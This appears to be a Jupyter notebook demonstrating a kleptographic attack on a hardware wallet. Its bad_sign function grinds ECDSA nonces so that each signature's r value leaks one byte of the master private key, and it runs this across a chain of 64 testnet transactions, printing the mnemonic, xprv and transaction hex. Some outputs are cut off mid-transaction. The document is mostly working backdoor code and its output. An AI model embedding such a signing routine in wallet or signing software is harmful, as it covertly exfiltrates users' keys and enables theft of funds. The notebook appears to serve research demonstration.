In [1]:
from ipywidgets import FloatProgress
from IPython.display import display

from io import BytesIO
import random

# some elliptic curve functions from Jimmy Song's library
from ecc import *
from hd import *
from tx import *

# Hardware wallet

In [24]:
mnemonic = "deliver page pudding intact unable renew melt veteran insane tobacco dune napkin"
master = HDPrivateKey.from_mnemonic(mnemonic, testnet=True)
print("We will try to leak this key:")
print("xprv:", master.xprv())
print("Chain code:", master.chain_code.hex())
print("Private key:", master.private_key.secret.to_bytes(32, 'big').hex())
mpk = master.chain_code+master.private_key.secret.to_bytes(32, 'big')
print("\nHex representation:")
print(mpk.hex())

# child keys for receive and change addresses, according to BIP44, testnet
receive_keys = master.traverse(b"m/44'/1'/0'/0")
change_keys = master.traverse(b"m/44'/1'/0'/1")

We will try to leak this key:
xprv: tprv8ZgxMBicQKsPdk5HkCWcUUZytAVPBnz7Qrw5x7RdgwyEVEaRtRyaQWF1A6M2nX6ypdcVeTvUtjMGWs3EDFJDeRHQsqCAp1Ad6xvwDmXfGeQ
Chain code: 576d24362f1bf8a607dce491c9e2c602dcc4888c18a59ec0f085930e305b9181
Private key: abd04002aeac340b047a02c9bf9fcea9d51000d07d89fc45a5334af4231e6194

Hex representation:
576d24362f1bf8a607dce491c9e2c602dcc4888c18a59ec0f085930e305b9181abd04002aeac340b047a02c9bf9fcea9d51000d07d89fc45a5334af4231e6194


# Transactions
We will need to inject private key information byte by byte into nonces of 64 transactions. It can be done in smaller / larger amounts of transactions depending on the size of injected information. As this is a proof of concept implementation efficiency and speed don't really matter, so let it be 64 transactions, in every signature 1 byte for index and 1 byte for actual private key data.

Transaction tree will look as follows:
```
external addr    → m/44'/1'/0'/0/0   - funding our hardware wallet
m/44'/1'/0'/0/0  → external addr     - paying some amount
                 → m/44'/1'/0'/1/0   - change amount
m/44'/1'/0'/1/0  → external addr     - paying some amount
                 → m/44'/1'/0'/1/1   - change amount
...
m/44'/1'/0'/1/i  → external addr     - paying some amount
                 → m/44'/1'/0'/1/i+1 - change amount
...
m/44'/1'/0'/1/63 → external addr     - paying some amount
                 → m/44'/1'/0'/1/64  - change amount
```
After these transactions we will get the full private master key leaked and the attacker will be able to reconstruct it. 

# Modified signing algorithm
Instead of a normal signing algorithm where we were deriving deterministic k, we will start with deterministic k as usual and then increment k by one until we get a random point starting with `<i><mpk[i]>`:

In [35]:
# malicious signing
def bad_sign(z, pk, i):
    # use deterministic signatures
    k = pk.deterministic_k(z)
    # r is the x coordinate of the resulting point k*G
    R = k*G
    while ((R.x.num >> (248)) != (i%64)) or ((R.x.num >> (240))&0xFF != mpk[i%64]):
        k+=1
        R+=G # algorithm is not optimized => this operation is slow. Many optimizations can be done to speed up.
    r = R.x.num
    # remember 1/k = pow(k, N-2, N)
    k_inv = pow(k, N-2, N)
    # s = (z+r*secret) / k
    s = (z + r*pk.secret) * k_inv % N
    if s > N/2:
        s = N - s
    # return an instance of Signature:
    # Signature(r, s)
    return Signature(r, s)

def bad_sign_tx(tx, input_index, pk, i):
    tx_in = tx.tx_ins[input_index]
    # calculating hash to sign
    z = tx.sig_hash(input_index, SIGHASH_ALL)
    sig = bad_sign(z, pk, i)
    
    der = sig.der()
    # append the hash_type to der
    sig = der + bytes([SIGHASH_ALL])
    # calculate the sec
    sec = pk.point.sec(compressed=pk.compressed)
    # initialize a new script with [sig, sec] as the elements
    # change input's script_sig to new script
    tx_in.script_sig = Script([sig, sec])
    # return whether sig is valid using tx.verify_input
    return tx.verify_input(input_index)

# Signing transaction

A transaction from external address to our wallet: 

https://live.blockcypher.com/btc-testnet/tx/82be4ae41e5f9cc5ecb43c369558999be3929816a95c1d7253577cfa1e5f0a66/

In [53]:
# private key controlling tx
mykey = receive_keys.child(0)
# receiving address
myaddress = mykey.address()
print(myaddress)
value_available = 7000000

# constructing an unsigned transaction to spend
# input
prev_tx = bytes.fromhex("82be4ae41e5f9cc5ecb43c369558999be3929816a95c1d7253577cfa1e5f0a66")
prev_index = 0
tx_in = TxIn(prev_tx, prev_index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(myaddress)['script_pubkey']
tx_in._value = value_available
tx_ins = [ tx_in ]

destination_addr = "2N8rpE4YuhcYJV7pZiHgUmJSziJVBWf4CoD"
send_amount = 100000
fee = 1500
child_index = 0
change_key = change_keys.child(child_index)
change_address = change_key.address()
# outputs
tx_outs = [
    # sending some money to 2N8rpE4YuhcYJV7pZiHgUmJSziJVBWf4CoD
    TxOut(send_amount, Tx.get_address_data(destination_addr)['script_pubkey'].serialize()),
    # change goes back to the same address
    TxOut(value_available - send_amount - fee, Tx.get_address_data(change_address)['script_pubkey'].serialize())
]

tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
bad_sign_tx(tx, 0, mykey.private_key, child_index)

miYMX37jmdQA6ymQnZp2VBaaSK3119bhms


True

In [59]:
# first transaction:
print("First hex transaction")
print(tx.serialize().hex())
print("\nr value of the signature:")
print(Signature.parse(tx.tx_ins[0].script_sig.elements[0][:-1]).r.to_bytes(32,'big').hex())
print("\ntx:", tx)

First hex transaction
0100000001660a5f1efa7c5753721d5ca9169892e39b995895363cb4ecc59c5f1ee44abe820000000069463043021f57360015b25dc6eceeb44192e2476a1c7985ef44db03474f9703edb3ff139202205e0e5ff299f7ed4f488c9d09d5b7961e87c1251554f560aea1c25d7c474d5f60012102615590c51a388d4aa0c1f62ea699a5fcf91ae8aec53514404dfd5a768073efffffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee78744436900000000001976a914e3a28fe35d1d5ec30caf54523afcb052e20cd47f88ac00000000

r value of the signature:
0057360015b25dc6eceeb44192e2476a1c7985ef44db03474f9703edb3ff1392

tx: 5795b9ab35c0bc10f39f3d9a10193d3511225d17d89f36890f7adb8b7af440c7
version: 1
tx_ins:
82be4ae41e5f9cc5ecb43c369558999be3929816a95c1d7253577cfa1e5f0a66:0

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
6898500:1Mkd8ZEF2Sp4q8UY7wo4LUYvGprQji9GJY

locktime: 0



In [62]:
tx.hash().hex()

'5795b9ab35c0bc10f39f3d9a10193d3511225d17d89f36890f7adb8b7af440c7'

Here you see first `00` is an index, `57` is the first byte of the private key

# Cycling over 64 transactions

Checking two first bytes of the r value in the signatures 

from https://live.blockcypher.com/btc-testnet/tx/5795b9ab35c0bc10f39f3d9a10193d3511225d17d89f36890f7adb8b7af440c7/

to https://live.blockcypher.com/btc-testnet/tx/dd39e8dbb028977829f5250725c66bd7370a1f2d8444819735dd7ead02b7557d/

one can derive a master private key of the HD wallet.

In [63]:
for i in range(64):
    # incrementing keys etc.
    # tx -> prev_tx
    prev_tx = tx.hash()
    prev_index = 1
    mykey = change_key
    myaddress = change_address
    child_index += 1
    change_key = change_keys.child(child_index)
    change_address = change_key.address()
    value_available = value_available - send_amount - fee
    
    tx_in = TxIn(prev_tx, prev_index, b'', 0xffffffff)
    tx_in._script_pubkey = Tx.get_address_data(myaddress)['script_pubkey']
    tx_in._value = value_available
    tx_ins = [ tx_in ]

    destination_addr = "2N8rpE4YuhcYJV7pZiHgUmJSziJVBWf4CoD"
    # outputs
    tx_outs = [
        # sending some money to 2N8rpE4YuhcYJV7pZiHgUmJSziJVBWf4CoD
        TxOut(send_amount, Tx.get_address_data(destination_addr)['script_pubkey'].serialize()),
        # change goes back to the same address
        TxOut(value_available - send_amount - fee, Tx.get_address_data(change_address)['script_pubkey'].serialize())
    ]

    tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
    bad_sign_tx(tx, 0, mykey.private_key, child_index)
    print("\nTransaction", child_index)
    print("Hex transaction")
    print(tx.serialize().hex())
    print("\nr value of the signature:")
    print(Signature.parse(tx.tx_ins[0].script_sig.elements[0][:-1]).r.to_bytes(32,'big').hex())
    print("\ntx:", tx)


Transaction 1
Hex transaction
0100000001c740f47a8bdb7a0f89369fd8175d2211353d19109a3d9ff310bcc035abb99557010000006a4730440220016d24c28dff49f70f1a3c146b2c48abaa1b4f5f576e0aa96c19a68ddfbd28cd02200c0897a062f669026aa756437fc4b31efcb7ae78774bd3cb13fcea1209297ea00121020b26b7838b5859415f9a2fe0b00fd402667cbdc5969add3b4e0238e8987c6058ffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee787c8b66700000000001976a9142b28ab1c0166ead6c97821ed5a9cc3db1298ec6488ac00000000

r value of the signature:
016d24c28dff49f70f1a3c146b2c48abaa1b4f5f576e0aa96c19a68ddfbd28cd

tx: c9d3ad29cc04cbdc86fe9215e8b79dd35fb210b9b240614e5a21dde878f0d694
version: 1
tx_ins:
5795b9ab35c0bc10f39f3d9a10193d3511225d17d89f36890f7adb8b7af440c7:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
6797000:14wCmwRo98dUkeCpSRknBAAEGUCmHZy6Gg

locktime: 0


Transaction 2
Hex transaction
010000000194d6f078e8dd215a4e6140b2b910b25fd39db7e81592fe86dccb04cc29add3c9010000006a47304402200224ec287fa4beb323894b67e5550de570e3b196


Transaction 11
Hex transaction
01000000012a983063fde94887292f7beab945d97b1c9f55ae487cb674c90a0543cad46d00010000006a47304402200b9100354c43a5cd69f27c0e91c05252363ba6db98f8de187f13015d193da9de0220226d16a8f6b6f3a7d0826423ea1633aa71c011fc12177dc278ad63f0f6dd1bad0121031692ab1331a41183d974699f4504f97f44a1fd8d3db7ecbca64406be1afbe73fffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee787f0395800000000001976a914866a5d41ae0d3ea53dd8e75436d0f9b933e42c5388ac00000000

r value of the signature:
0b9100354c43a5cd69f27c0e91c05252363ba6db98f8de187f13015d193da9de

tx: c4217f2bf16c49b6aba234ae174aaac7272f43c451cbc93de519606ed3ac685f
version: 1
tx_ins:
006dd4ca43050ac974b67c48ae559f1c7bd945b9ea7b2f298748e9fd6330982a:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
5782000:1DFiy2TwnKbYCGTRLBuwxawTLRdy56y1fd

locktime: 0


Transaction 12
Hex transaction
01000000015f68acd36e6019e53dc9cb51c4432f27c7aa4a17ae34a2abb6496cf12b7f21c4010000006a47304402200cc9ce075ab4b2cca69200ad6aadc6420150b4


Transaction 21
Hex transaction
0100000001f02f20782cce2344883405124d6c1cc05ba7f685f0301ea232f7497e78db52c7010000006a473044022015a5fb4ae9a12d7bc85271ea52fc98133c273ffb6ea521dc8fae95fc8ae307da022054bf84abc97a1302c1ecfa17feb5a36d9197ccc346690fec4e6634d33b832abd012102a81132bcea8f28f19b89e0ad03c7e83fe6f041a7a1fc2f388f3ae71c8ca8c72fffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee78718bd4800000000001976a914246946e286f935695ca5b9788e76b84858581ac088ac00000000

r value of the signature:
15a5fb4ae9a12d7bc85271ea52fc98133c273ffb6ea521dc8fae95fc8ae307da

tx: 6def6a0b71919aa6f7e6078a6f018ec4df9da0340eb69e483319087828723b4b
version: 1
tx_ins:
c752db787e49f732a21e30f085f6a75bc01c6c4d120534884423ce2c78202ff0:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
4767000:14KXSg24Uihg9JWJwizGDKtwWZhNoWtJJ8

locktime: 0


Transaction 22
Hex transaction
01000000014b3b722878081933489eb60e34a09ddfc48e016f8a07e6f7a69a91710b6aef6d010000006a4730440220169e5a7d4a57a498d2215a1a639156ccae85cc


Transaction 31
Hex transaction
01000000016fd4ebd2dff54e6a027a94ca980fdc3aa1ee6937bd7418fb8db0a760e4e4e35c010000006a47304402201f81bffefa8173b3a9ed805e1a2f0a03293ae3227feb58ebe193d1d3e355812f02203d2a2bacc0ec6337d79d2929075fb79cb6f1c38ffecabbde54f3df39b4f95bb6012102325d09be3c091cab00e45ab5ba5a57e6602b36ca6cf9daeeb07b0c9d17a7d75bffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee78740403900000000001976a9141dc5c763df3cf9136b43d2ead5b9a5db9c400bc088ac00000000

r value of the signature:
1f81bffefa8173b3a9ed805e1a2f0a03293ae3227feb58ebe193d1d3e355812f

tx: 0f156f2aee99af2f51e37c6006d4fdb6b52e4a961651abb6da5b8b69daa5d7fc
version: 1
tx_ins:
5ce3e4e460a7b08dfb1874bd3769eea13adc0f98ca947a026a4ef5dfd2ebd46f:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
3752000:13iRXUpnBk3xEeqdoayg6ZaietcERfTHyG

locktime: 0


Transaction 32
Hex transaction
0100000001fcd7a5da698b5bdab6ab5116964a2eb5b6fdd406607ce3512faf99ee2a6f150f010000006a473044022020abe7ee6d8a124424fcedaf523b0f957ff3dc


Transaction 41
Hex transaction
0100000001e22f9eb87cbc6155287d08cf800c5541fa8b52e20d550ebd43ded2c3bb10335c010000006a4730440220297ad49593df3ad92d583b3ed23e50aca450fc36f99bf6ba283afe74ab6cfa8b02200311b4f4cfb9dea6c13490f4183cdd49fb0b636dd59f1bcb27dc7fc60f8a294b012103c9bc029307d2ef26a156a4ed572c3ba80964a8010960f875becddd355d358711ffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee78768c32900000000001976a914aa450a52df7a13a6b563d2d8b6fd5b7a79b7d42b88ac00000000

r value of the signature:
297ad49593df3ad92d583b3ed23e50aca450fc36f99bf6ba283afe74ab6cfa8b

tx: 99ba3970fd5a566432146a8f99547e77ef2787f662fab4190771745e632ca0ac
version: 1
tx_ins:
5c3310bbc3d2de43bd0e550de2528bfa41550c80cf087d285561bc7cb89e2fe2:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
2737000:1GXJacoERyfoPtH9JZyJgtfu1GETBA58PS

locktime: 0


Transaction 42
Hex transaction
0100000001aca02c635e74710719b4fa62f68727ef777e54998f6a143264565afd7039ba99010000006a47304402202a02acdd567b4d46d054cc007cce752e430443


Transaction 51
Hex transaction
010000000109689dc6e474c58923fbe3e346010335e86bf1bc28a4aacd7a0cd8ae85aef8b2010000006a473044022033d04b21fcf7cf1a73e89c5bce651ef28735165c06a9022dea0e2690874912e80220674500a51fd70f44e2f0aa654ba150768f21bfd6c52d53516f63e3915a0447cf0121027d46d6152c8bdc950030690da6bfd34e4678e316f100d8ac8676a62fd9a6a819ffffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee78790461a00000000001976a914c38d53a86c30f6ad5725fc229b128850919695b288ac00000000

r value of the signature:
33d04b21fcf7cf1a73e89c5bce651ef28735165c06a9022dea0e2690874912e8

tx: f9b8d26b00db2bb4d1c413ef1c9257cadaaff34783352c8f776a48ba0aa96f1d
version: 1
tx_ins:
b2f8ae85aed80c7acdaaa428bcf16be835030146e3e3fb2389c574e4c69d6809:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
1722000:1Jpz4xw6hZvmdB53xJjsxhzZ7GMeRHQ2ig

locktime: 0


Transaction 52
Hex transaction
01000000011d6fa90aba486a778f2c358347f3afdaca57921cef13c4d1b42bdb006bd2b8f9010000006a4730440220347da95376dd521b1e5c09cd7959126eab7db5


Transaction 61
Hex transaction
01000000012d0b635d531727c16c527945011d70383165b865ac4ba654b7920463f6316695010000006a47304402203d1e5c1596acce05c69175670fc90fa0868c7ba902d0d670ed4dff0d92d96d6a022076b14ba4ee084d1de277e3c6a6d44709ce22e4560657490c6f600a94a1fbb1620121036be76513513dac54e9d8eb0c0c80f5de6554f42dc73cf72f4a86038f1d51e29effffffff02a08601000000000017a914ab450686769fb7b40f3f3e9e9a73d14bf449dee787b8c90a00000000001976a91430bce38412c54e7433db5be12c263050e7ffd4fc88ac00000000

r value of the signature:
3d1e5c1596acce05c69175670fc90fa0868c7ba902d0d670ed4dff0d92d96d6a

tx: cbc08b19978faf7e81853a9e7ac8f6792e79aebaf9743962df07e3d16d74a7a0
version: 1
tx_ins:
956631f6630492b754a64bac65b8653138701d014579526cc12717535d630b2d:1

tx_outs:
100000:1GcbEn8SYFiaCAVav4Q1ij6oMRzJ9h4feq
707000:15ShiRn3dKxAUgmWEbVEqFeGo7ckyjGvZn

locktime: 0


Transaction 62
Hex transaction
0100000001a0a7746dd1e307df623974f9baae792e79f6c87a9e3a85817eaf8f97198bc0cb010000006a47304402203e61069c2a2e10ebc73976eb383a0299cbbe210